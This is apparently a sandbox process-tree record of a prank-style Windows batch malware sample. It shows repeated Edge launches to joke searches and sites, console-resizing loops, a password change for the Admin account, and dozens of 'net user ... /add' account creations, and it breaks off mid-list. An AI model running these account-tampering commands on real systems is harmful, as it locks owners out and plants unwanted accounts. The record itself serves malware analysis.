C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=10436,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10656 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:5576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=11232,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11212 /prefetch:84⤵PID:5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=10992,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11048 /prefetch:14⤵PID:6532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=11224,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11280 /prefetch:14⤵PID:6464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=10680,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11148 /prefetch:14⤵PID:6696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=11464,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11480 /prefetch:14⤵PID:6456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=5440,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=3700 /prefetch:14⤵PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=11256,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11492 /prefetch:84⤵PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --always-read-main-dll --field-trial-handle=11516,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11076 /prefetch:14⤵PID:900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --always-read-main-dll --field-trial-handle=11152,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11368 /prefetch:14⤵PID:2356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --always-read-main-dll --field-trial-handle=11628,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11408 /prefetch:14⤵PID:7080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --always-read-main-dll --field-trial-handle=11564,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11500 /prefetch:14⤵PID:4204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --always-read-main-dll --field-trial-handle=11576,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11604 /prefetch:14⤵PID:6764
-
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=youtube+killscreen3⤵PID:4508
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=dank+ajae3⤵PID:5404
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=mydoom+virus+free+download+no+virus3⤵PID:3736
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=my+computer+is+doing+weird+things+wtf+is+happening+plz+halp3⤵PID:3416
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=fuck+you3⤵PID:1636
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bfdi+hax+download3⤵PID:1552
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://softendo.com/3⤵PID:5912
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=new+super+mario+bros+forever+2012+download+no+virus3⤵PID:2424
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bored+smashing3⤵PID:2724
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=batch+virus+download3⤵PID:4984
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:3604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youareanidiot.cc/3⤵PID:4960
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=i+crave+beans3⤵PID:4124
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.nl/search?q=smoll+pp3⤵PID:2824
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=strawberry+benis3⤵PID:2272
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+with+no+braincells3⤵PID:6488
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+kissing+gif3⤵PID:6832
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=theshellshield3⤵PID:7136
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:7148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=stinky+bitch3⤵PID:6488
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=guys+im+drunk3⤵PID:5224
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:3440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=coiny+dont+stop3⤵PID:5992
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=h3lp+m33⤵PID:6448
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=nitro+generator+WITH+virus3⤵PID:5056
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:1964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.breakmylegs.com/3⤵PID:4856
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=motherfuckers3⤵PID:2380
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=robux+download+no+virus3⤵PID:5520
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=BEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEAAAAAAAAAAAAAAAAAAAAAAOOOOAAAOAAAOOOAOAOAO3⤵PID:6376
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.tictac.com/3⤵PID:220
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=what+is+my+credit+card+number3⤵PID:2284
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:6472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=let+the+games+begin3⤵PID:992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Windows\N3OS3X3R\cds.bat3⤵PID:4844
-
C:\Windows\system32\mode.commode 804⤵PID:6460
-
-
C:\Windows\system32\mode.commode 704⤵PID:6472
-
-
C:\Windows\system32\mode.commode 504⤵PID:3076
-
-
C:\Windows\system32\mode.commode 404⤵PID:6460
-
-
C:\Windows\system32\mode.commode 304⤵PID:6460
-
-
C:\Windows\system32\mode.commode 804⤵PID:6480
-
-
C:\Windows\system32\mode.commode 704⤵PID:6460
-
-
C:\Windows\system32\mode.commode 504⤵PID:6572
-
-
C:\Windows\system32\mode.commode 404⤵PID:1268
-
-
C:\Windows\system32\mode.commode 304⤵PID:2764
-
-
C:\Windows\system32\mode.commode 804⤵PID:6324
-
-
C:\Windows\system32\mode.commode 704⤵PID:6460
-
-
C:\Windows\system32\mode.commode 504⤵PID:1268
-
-
C:\Windows\system32\mode.commode 404⤵PID:6724
-
-
C:\Windows\system32\mode.commode 304⤵PID:6580
-
-
C:\Windows\system32\mode.commode 804⤵PID:1332
-
-
C:\Windows\system32\mode.commode 704⤵PID:3076
-
-
C:\Windows\system32\mode.commode 504⤵PID:960
-
-
C:\Windows\system32\mode.commode 404⤵PID:6572
-
-
C:\Windows\system32\mode.commode 304⤵PID:7204
-
-
C:\Windows\system32\mode.commode 804⤵PID:7272
-
-
C:\Windows\system32\mode.commode 704⤵PID:7336
-
-
C:\Windows\system32\mode.commode 504⤵PID:7384
-
-
C:\Windows\system32\mode.commode 404⤵PID:7452
-
-
C:\Windows\system32\mode.commode 304⤵PID:7504
-
-
C:\Windows\system32\mode.commode 804⤵PID:7532
-
-
C:\Windows\system32\mode.commode 704⤵PID:7564
-
-
C:\Windows\system32\mode.commode 504⤵PID:7604
-
-
C:\Windows\system32\mode.commode 404⤵PID:7680
-
-
C:\Windows\system32\mode.commode 304⤵PID:7728
-
-
C:\Windows\system32\mode.commode 804⤵PID:7776
-
-
C:\Windows\system32\mode.commode 704⤵PID:7828
-
-
C:\Windows\system32\mode.commode 504⤵PID:7876
-
-
C:\Windows\system32\mode.commode 404⤵PID:7924
-
-
C:\Windows\system32\mode.commode 304⤵PID:7972
-
-
C:\Windows\system32\mode.commode 804⤵PID:8028
-
-
C:\Windows\system32\mode.commode 704⤵PID:8076
-
-
C:\Windows\system32\mode.commode 504⤵PID:8180
-
-
C:\Windows\system32\mode.commode 404⤵PID:6580
-
-
C:\Windows\system32\mode.commode 304⤵PID:7232
-
-
C:\Windows\system32\mode.commode 804⤵PID:5180
-
-
C:\Windows\system32\mode.commode 704⤵PID:7584
-
-
C:\Windows\system32\mode.commode 504⤵PID:7648
-
-
C:\Windows\system32\mode.commode 404⤵PID:7740
-
-
C:\Windows\system32\mode.commode 304⤵PID:7792
-
-
C:\Windows\system32\mode.commode 804⤵PID:7860
-
-
C:\Windows\system32\mode.commode 704⤵PID:7900
-
-
C:\Windows\system32\mode.commode 504⤵PID:7972
-
-
C:\Windows\system32\mode.commode 404⤵PID:8108
-
-
C:\Windows\system32\mode.commode 304⤵PID:6480
-
-
C:\Windows\system32\mode.commode 804⤵PID:7628
-
-
C:\Windows\system32\mode.commode 704⤵PID:7888
-
-
C:\Windows\system32\mode.commode 504⤵PID:7988
-
-
C:\Windows\system32\mode.commode 404⤵PID:8084
-
-
C:\Windows\system32\mode.commode 304⤵PID:8168
-
-
C:\Windows\system32\mode.commode 804⤵PID:8188
-
-
C:\Windows\system32\mode.commode 704⤵PID:7276
-
-
C:\Windows\system32\mode.commode 504⤵PID:7648
-
-
C:\Windows\system32\mode.commode 404⤵PID:7908
-
-
C:\Windows\system32\mode.commode 304⤵PID:8064
-
-
C:\Windows\system32\mode.commode 804⤵PID:8000
-
-
C:\Windows\system32\mode.commode 704⤵PID:8056
-
-
C:\Windows\system32\mode.commode 504⤵PID:8060
-
-
C:\Windows\system32\mode.commode 404⤵PID:8076
-
-
C:\Windows\system32\mode.commode 304⤵PID:8116
-
-
C:\Windows\system32\mode.commode 804⤵PID:8068
-
-
C:\Windows\system32\mode.commode 704⤵PID:8132
-
-
C:\Windows\system32\mode.commode 504⤵PID:8144
-
-
C:\Windows\system32\mode.commode 404⤵PID:1796
-
-
C:\Windows\system32\mode.commode 304⤵PID:7212
-
-
C:\Windows\system32\mode.commode 804⤵PID:7968
-
-
C:\Windows\system32\mode.commode 704⤵PID:7460
-
-
C:\Windows\system32\mode.commode 504⤵PID:6472
-
-
C:\Windows\system32\mode.commode 404⤵PID:7520
-
-
C:\Windows\system32\mode.commode 304⤵PID:7640
-
-
C:\Windows\system32\mode.commode 804⤵PID:7564
-
-
C:\Windows\system32\mode.commode 704⤵PID:7612
-
-
C:\Windows\system32\mode.commode 504⤵PID:7768
-
-
C:\Windows\system32\mode.commode 404⤵PID:7772
-
-
C:\Windows\system32\mode.commode 304⤵PID:7596
-
-
C:\Windows\system32\mode.commode 804⤵PID:7908
-
-
C:\Windows\system32\mode.commode 704⤵PID:8064
-
-
C:\Windows\system32\mode.commode 504⤵PID:8032
-
-
C:\Windows\system32\mode.commode 404⤵PID:8056
-
-
C:\Windows\system32\mode.commode 304⤵PID:8092
-
-
C:\Windows\system32\mode.commode 804⤵PID:7996
-
-
C:\Windows\system32\mode.commode 704⤵PID:8020
-
-
C:\Windows\system32\mode.commode 504⤵PID:8084
-
-
C:\Windows\system32\mode.commode 404⤵PID:8132
-
-
C:\Windows\system32\mode.commode 304⤵PID:2764
-
-
C:\Windows\system32\mode.commode 804⤵PID:8144
-
-
C:\Windows\system32\mode.commode 704⤵PID:8168
-
-
C:\Windows\system32\mode.commode 504⤵PID:7212
-
-
C:\Windows\system32\mode.commode 404⤵PID:7436
-
-
C:\Windows\system32\mode.commode 304⤵PID:7968
-
-
C:\Windows\system32\mode.commode 804⤵PID:8124
-
-
C:\Windows\system32\mode.commode 704⤵PID:7460
-
-
C:\Windows\system32\mode.commode 504⤵PID:8172
-
-
C:\Windows\system32\mode.commode 404⤵PID:7520
-
-
C:\Windows\system32\mode.commode 304⤵PID:7664
-
-
C:\Windows\system32\mode.commode 804⤵PID:7640
-
-
C:\Windows\system32\mode.commode 704⤵PID:7676
-
-
C:\Windows\system32\mode.commode 504⤵PID:7684
-
-
C:\Windows\system32\mode.commode 404⤵PID:7708
-
-
C:\Windows\system32\mode.commode 304⤵PID:7612
-
-
C:\Windows\system32\mode.commode 804⤵PID:7668
-
-
C:\Windows\system32\mode.commode 704⤵PID:7768
-
-
C:\Windows\system32\mode.commode 504⤵PID:7908
-
-
C:\Windows\system32\mode.commode 404⤵PID:2848
-
-
C:\Windows\system32\mode.commode 304⤵PID:7440
-
-
C:\Windows\system32\mode.commode 804⤵PID:7232
-
-
C:\Windows\system32\mode.commode 704⤵PID:8148
-
-
C:\Windows\system32\mode.commode 504⤵PID:7364
-
-
C:\Windows\system32\mode.commode 404⤵PID:7428
-
-
C:\Windows\system32\mode.commode 304⤵PID:8188
-
-
C:\Windows\system32\mode.commode 804⤵PID:7288
-
-
C:\Windows\system32\mode.commode 704⤵PID:7632
-
-
-
C:\Windows\system32\net.exenet user Admin ih82011jaxs3⤵PID:1268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin ih82011jaxs4⤵PID:6752
-
-
-
C:\Windows\system32\net.exenet user Admin20297 /add3⤵PID:6580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin20297 /add4⤵PID:3076
-
-
-
C:\Windows\system32\net.exenet user Admin28208 /add3⤵PID:1796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin28208 /add4⤵PID:6460
-
-
-
C:\Windows\system32\net.exenet user Admin12597 /add3⤵PID:216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin12597 /add4⤵PID:6472
-
-
-
C:\Windows\system32\net.exenet user Admin12200 /add3⤵PID:6572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin12200 /add4⤵PID:6480
-
-
-
C:\Windows\system32\net.exenet user Admin10681 /add3⤵PID:6472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin10681 /add4⤵PID:6572
-
-
-
C:\Windows\system32\net.exenet user Admin14202 /add3⤵PID:1188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin14202 /add4⤵PID:6572
-
-
-
C:\Windows\system32\net.exenet user Admin17865 /add3⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin17865 /add4⤵PID:6472
-
-
-
C:\Windows\system32\net.exenet user Admin12754 /add3⤵PID:2764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin12754 /add4⤵PID:6324
-
-
-
C:\Windows\system32\net.exenet user Admin12234 /add3⤵PID:6480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin12234 /add4⤵PID:1332
-
-
-
C:\Windows\system32\net.exenet user Admin6878 /add3⤵PID:6724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin6878 /add4⤵PID:960
-
-
-
C:\Windows\system32\net.exenet user Admin26905 /add3⤵PID:1268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin26905 /add4⤵PID:960
-
-
-
C:\Windows\system32\net.exenet user Admin21676 /add3⤵PID:6580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin21676 /add4⤵PID:6724
-
-
-
C:\Windows\system32\net.exenet user Admin16664 /add3⤵PID:6572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin16664 /add4⤵PID:6472
-
-
-
C:\Windows\system32\net.exenet user Admin6295 /add3⤵PID:2764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin6295 /add4⤵PID:3076
-
-
-
C:\Windows\system32\net.exenet user Admin32070 /add3⤵PID:6324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin32070 /add4⤵PID:1796
-
-
-
C:\Windows\system32\net.exenet user Admin2406 /add3⤵PID:6572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin2406 /add4⤵PID:3076
-
-
-
C:\Windows\system32\net.exenet user Admin874 /add3⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin874 /add4⤵PID:6460
-
-
-
C:\Windows\system32\net.exenet user Admin4962 /add3⤵PID:6572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin4962 /add4⤵PID:1796
-
-
-
C:\Windows\system32\net.exenet user Admin7651 /add3⤵PID:1332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin7651 /add4⤵PID:6580
-
-
-
C:\Windows\system32\net.exenet user Admin29140 /add3⤵PID:6572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin29140 /add4⤵PID:1796
-
-
-
C:\Windows\system32\net.exenet user Admin29586 /add3⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin29586 /add4⤵PID:2848
-
-
-
C:\Windows\system32\net.exenet user Admin11735 /add3⤵PID:6480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin11735 /add4⤵PID:6580
-
-
-
C:\Windows\system32\net.exenet user Admin22524 /add3⤵PID:7212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin22524 /add4⤵PID:7240
-
-
-
C:\Windows\system32\net.exenet user Admin18532 /add3⤵PID:7264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin18532 /add4⤵PID:7292
-
-
-
C:\Windows\system32\net.exenet user Admin32149 /add3⤵PID:7328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin32149 /add4⤵PID:7360
-
-
-
C:\Windows\system32\net.exenet user Admin4600 /add3⤵PID:7376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin4600 /add4⤵PID:7400
-
-
-
C:\Windows\system32\net.exenet user Admin9047 /add3⤵PID:7424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin9047 /add4⤵PID:7436
-
-
-
C:\Windows\system32\net.exenet user Admin1106 /add3⤵PID:7476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin1106 /add4⤵PID:7492
-
-
-
C:\Windows\system32\net.exenet user Admin24588 /add3⤵PID:7548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin24588 /add4⤵PID:7572
-
-
-
C:\Windows\system32\net.exenet user Admin22283 /add3⤵PID:7596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin22283 /add4⤵PID:7628
-
-
-
C:\Windows\system32\net.exenet user Admin249 /add3⤵PID:7644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin249 /add4⤵PID:7664
-
-
-
C:\Windows\system32\net.exenet user Admin3615 /add3⤵PID:7696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin3615 /add4⤵PID:7712
-
-
-
C:\Windows\system32\net.exenet user Admin24266 /add3⤵PID:7744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin24266 /add4⤵PID:7756
-
-
-
C:\Windows\system32\net.exenet user Admin31141 /add3⤵PID:7796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin31141 /add4⤵PID:7808
-
-
-
C:\Windows\system32\net.exenet user Admin25324 /add3⤵PID:7844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin25324 /add4⤵PID:7860
-
-
-
C:\Windows\system32\net.exenet user Admin6207 /add3⤵PID:7892
-
